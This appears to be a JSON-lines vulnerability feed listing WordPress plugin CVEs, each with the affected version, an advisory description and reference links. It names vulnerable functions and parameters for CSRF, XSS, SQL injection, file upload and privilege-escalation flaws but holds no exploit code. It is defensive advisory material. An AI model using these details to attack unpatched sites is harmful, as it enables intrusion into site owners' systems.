{"CVE_ID":"CVE-2025-7668","slug":"linux-promotional-plugin","versionImpact":"1.4","description":"The Linux Promotional Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4. This is due to missing or incorrect nonce validation on the 'inux-promotional-plugin.php' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linux-promotional-plugin\\\/trunk\\\/linux-promotional-plugin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linux-promotional-plugin\\\/trunk\\\/linux-promotional-plugin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/linux-promotional-plugin\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/linux-promotional-plugin\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a3e3d91-5ce5-4db1-856e-c1d12471f9ed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a3e3d91-5ce5-4db1-856e-c1d12471f9ed?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4389","slug":"wp-travel","versionImpact":"4.4.6","description":"The WP Travel plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.4.6. This is due to missing or incorrect nonce validation on the save_meta_data() function. This makes it possible for unauthenticated attackers to save metadata for travel posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28dea1e9-e772-488e-b98f-93a46ab84581?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28dea1e9-e772-488e-b98f-93a46ab84581?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2477827\\\/wp-travel\\\/tags\\\/4.4.7\\\/inc\\\/admin\\\/class-admin-metaboxes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2477827\\\/wp-travel\\\/tags\\\/4.4.7\\\/inc\\\/admin\\\/class-admin-metaboxes.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4954","slug":"waiting","versionImpact":"0.6.2","description":"The Waiting: One-click countdowns plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown name in versions up to, and including, 0.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ef5b0de-0b8b-4286-86ea-6dca0dbc1a52?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ef5b0de-0b8b-4286-86ea-6dca0dbc1a52?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waiting\\\/trunk\\\/waiting.php?rev=2826039\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waiting\\\/trunk\\\/waiting.php?rev=2826039\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2707","slug":"gAppointments","versionImpact":"1.9.5.1","description":"The gAppointments WordPress plugin through 1.9.5.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5664da4-5b78-4e42-be6b-e0d7b73a85b0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5664da4-5b78-4e42-be6b-e0d7b73a85b0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3628","slug":"easyevent","versionImpact":"1.0.0","description":"The EasyEvent WordPress plugin through 1.0.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/171af8eb-ceeb-403a-abc2-969d9535a4c9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/171af8eb-ceeb-403a-abc2-969d9535a4c9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3831","slug":"enteraddons","versionImpact":"2.1.5","description":"The Enter Addons \u2013 Ultimate Template Builder for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Heading widget in all versions up to, and including, 2.1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62a4dd6a-f970-483e-b1a8-d57f604b7b66?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62a4dd6a-f970-483e-b1a8-d57f604b7b66?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/enteraddons\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/enteraddons\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3921","slug":"gianism","versionImpact":"5.1.0","description":"The Gianism WordPress plugin through 5.1.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c114e14-9113-411d-91f3-2e2daeb40739\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c114e14-9113-411d-91f3-2e2daeb40739\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7061","slug":"file-manager-advanced-shortcode","versionImpact":"2.5.3","description":"The Advanced File Manager Shortcodes plugin for WordPress is vulnerable to arbitrary file uploads in all versions up to, and including, 2.5.3. This makes it possible for authenticated attackers with contributor access or above to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26050f70-7a10-4df5-acd5-1c9e7613bf2c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26050f70-7a10-4df5-acd5-1c9e7613bf2c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/advancedfilemanager.com\\\/product\\\/file-manager-advanced-shortcode-wordpress\\\/\",\"name\":\"https:\\\/\\\/advancedfilemanager.com\\\/product\\\/file-manager-advanced-shortcode-wordpress\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6152","slug":"flipbox-builder","versionImpact":"1.5","description":"The Flipbox Builder plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.5 via deserialization of untrusted input in the flipbox_builder_Flipbox_ShortCode function. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e9cd38a-b2cd-4801-a06b-4e965fa72e04?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e9cd38a-b2cd-4801-a06b-4e965fa72e04?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flipbox-builder\\\/trunk\\\/template-front\\\/shortcode.php#L30\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flipbox-builder\\\/trunk\\\/template-front\\\/shortcode.php#L30\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6804","slug":"jeg-elementor-kit","versionImpact":"2.6.7","description":"The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.6.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5491ff65-9060-4b0b-a31d-7b95ea581310?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5491ff65-9060-4b0b-a31d-7b95ea581310?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/tags\\\/2.6.7\\\/lib\\\/jeg-framework\\\/customizer\\\/class-customizer.php#L595\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/tags\\\/2.6.7\\\/lib\\\/jeg-framework\\\/customizer\\\/class-customizer.php#L595\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jeg-elementor-kit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jeg-elementor-kit\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139386\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139386\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8436","slug":"wp-easy-gallery","versionImpact":"4.8.5","description":"The WP Easy Gallery \u2013 WordPress Gallery Plugin plugin for WordPress is vulnerable to SQL Injection via the 'edit_imageId' and 'edit_imageDelete' parameters in all versions up to, and including, 4.8.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6eb094a-4f5a-418a-ba95-635765abfcff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6eb094a-4f5a-418a-ba95-635765abfcff?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-easy-gallery\\\/trunk\\\/wp-easy-gallery.php#L730\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-easy-gallery\\\/trunk\\\/wp-easy-gallery.php#L730\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12155","slug":"sv100-companion","versionImpact":"2.0.02","description":"The SV100 Companion plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the settings_import() function in all versions up to, and including, 2.0.02. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sv100-companion\\\/trunk\\\/lib\\\/modules\\\/sv_settings\\\/sv_settings.php#L47\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sv100-companion\\\/trunk\\\/lib\\\/modules\\\/sv_settings\\\/sv_settings.php#L47\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c244eb33-acaf-460b-ae1d-6688b21cc60f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c244eb33-acaf-460b-ae1d-6688b21cc60f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12535","slug":"host-php-info","versionImpact":"1.0.4","description":"The Host PHP Info plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check when including the 'phpinfo' function in all versions up to, and including, 1.0.4. This makes it possible for unauthenticated attackers to read configuration settings and predefined variables on the site's server. The plugin does not need to be activated for the vulnerability to be exploited.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/host-php-info\\\/trunk\\\/info.php#L2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/host-php-info\\\/trunk\\\/info.php#L2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88d27385-9b92-419c-9e03-687d7192bbb5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88d27385-9b92-419c-9e03-687d7192bbb5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13683","slug":"automate-hub-free-by-sperse-io","versionImpact":"1.7.0","description":"The Automate Hub Free by Sperse.IO plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.7.0. This is due to missing or incorrect nonce validation on the 'automate_hub' page. This makes it possible for unauthenticated attackers to update an activation status via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/trunk\\\/apps\\\/s\\\/sperse\\\/sperse.php#L141\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/trunk\\\/apps\\\/s\\\/sperse\\\/sperse.php#L141\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/automate-hub-free-by-sperse-io\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/automate-hub-free-by-sperse-io\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6d90ca3-dc24-4634-9f98-83a909e3e093?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6d90ca3-dc24-4634-9f98-83a909e3e093?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0181","slug":"wp-foodbakery","versionImpact":"4.8","description":"The WP Foodbakery plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 4.7. This is due to the plugin not properly validating a user's identity prior to setting the current user and their authentication cookie. This makes it possible for unauthenticated attackers to gain access to a target user's (e.g. administrators) account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/food-bakery-restaurant-bakery-responsive-wordpress-theme\\\/18970331\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/food-bakery-restaurant-bakery-responsive-wordpress-theme\\\/18970331\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d722ec8d-bfca-4da1-8eb0-8d33735c5e44?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d722ec8d-bfca-4da1-8eb0-8d33735c5e44?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1361","slug":"ip2location-country-blocker","versionImpact":"2.38.8","description":"The IP2Location Country Blocker plugin for WordPress is vulnerable to Regular Information Exposure in all versions up to, and including, 2.38.8 due to missing capability checks on the admin_init() function. This makes it possible for unauthenticated attackers to view the plugin's settings.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ip2location-country-blocker\\\/trunk\\\/ip2location-country-blocker.php#L114\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ip2location-country-blocker\\\/trunk\\\/ip2location-country-blocker.php#L114\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244193\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244193\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ip2location-country-blocker\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ip2location-country-blocker\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b63bc2b6-1abc-4cfa-a7e5-3995640f66a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b63bc2b6-1abc-4cfa-a7e5-3995640f66a7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13836","slug":"wp-login-control","versionImpact":"2.0.0","description":"The WP Login Control WordPress plugin through 2.0.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/26c2026a-1490-4a0f-9d1d-54ee43c69f22\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/26c2026a-1490-4a0f-9d1d-54ee43c69f22\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/26c2026a-1490-4a0f-9d1d-54ee43c69f22\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/26c2026a-1490-4a0f-9d1d-54ee43c69f22\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12189","slug":"wdesignkit","versionImpact":"1.2.2","description":"The WDesignKit \u2013 Elementor & Gutenberg Starter Templates, Patterns, Cloud Workspace & Widget Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via custom widgets in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wdesignkit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wdesignkit\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e936214-ee25-4763-ba7a-b5308cc09a57?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e936214-ee25-4763-ba7a-b5308cc09a57?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11719","slug":"tarteaucitron-wp","versionImpact":"0.2.5","description":"The tarteaucitron-wp WordPress plugin before 0.3.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/64c2a296-5fc6-450e-a12d-75cbf8b73e3a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/64c2a296-5fc6-450e-a12d-75cbf8b73e3a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1129","slug":"wp-fevents-book","versionImpact":"0.46","description":"The WP FEvents Book WordPress plugin through 0.46 does not ensures that bookings to be updated belong to the user making the request, allowing any authenticated user to book, add notes, or cancel booking on behalf of other users.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d40479de-fb04-41b8-9fb0-41b9eefbd8af\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d40479de-fb04-41b8-9fb0-41b9eefbd8af\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4388","slug":"opal-estate","versionImpact":"1.6.11","description":"The Opal Estate plugin for WordPress is vulnerable to featured property modifications in versions up to, and including, 1.6.11. This is due to missing  capability checks on the opalestate_set_feature_property() and opalestate_remove_feature_property() functions. This makes it possible for unauthenticated attackers to set and remove featured properties.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-estate\\\/trunk\\\/inc\\\/ajax-functions.php#L177\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-estate\\\/trunk\\\/inc\\\/ajax-functions.php#L177\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ce729a2-a106-45ab-b96c-cfe75246def7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ce729a2-a106-45ab-b96c-cfe75246def7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6391","slug":"oik","versionImpact":"4.10.3","description":"The oik plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's bw_button shortcode in all versions up to, and including, 4.10.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3dfa92a-57da-49ab-95f7-504fa99ed47f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3dfa92a-57da-49ab-95f7-504fa99ed47f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/oik\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/oik\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/oik\\\/trunk\\\/shortcodes\\\/oik-button.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/oik\\\/trunk\\\/shortcodes\\\/oik-button.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112763\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112763\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4410","slug":"ignitiondeck","versionImpact":"1.9.8","description":"The IgnitionDeck Crowdfunding Platform plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 1.9.8. This is due to missing capability checks on various functions called via AJAX actions in the ~\/classes\/class-idf-wizard.php file. This makes it possible for authenticated attackers, with subscriber access or higher, to execute various AJAX actions. This includes actions to change the permalink structure, plugin settings and others.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07b6aad4-fbaf-4c0c-b2b7-6e264a1afb9b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07b6aad4-fbaf-4c0c-b2b7-6e264a1afb9b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ignitiondeck\\\/trunk\\\/classes\\\/class-idf-wizard.php#L186\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ignitiondeck\\\/trunk\\\/classes\\\/class-idf-wizard.php#L186\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ignitiondeck\\\/trunk\\\/classes\\\/class-idf-wizard.php#L1162\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ignitiondeck\\\/trunk\\\/classes\\\/class-idf-wizard.php#L1162\",\"refsource\":\"\",\"tags\":[]}]"}
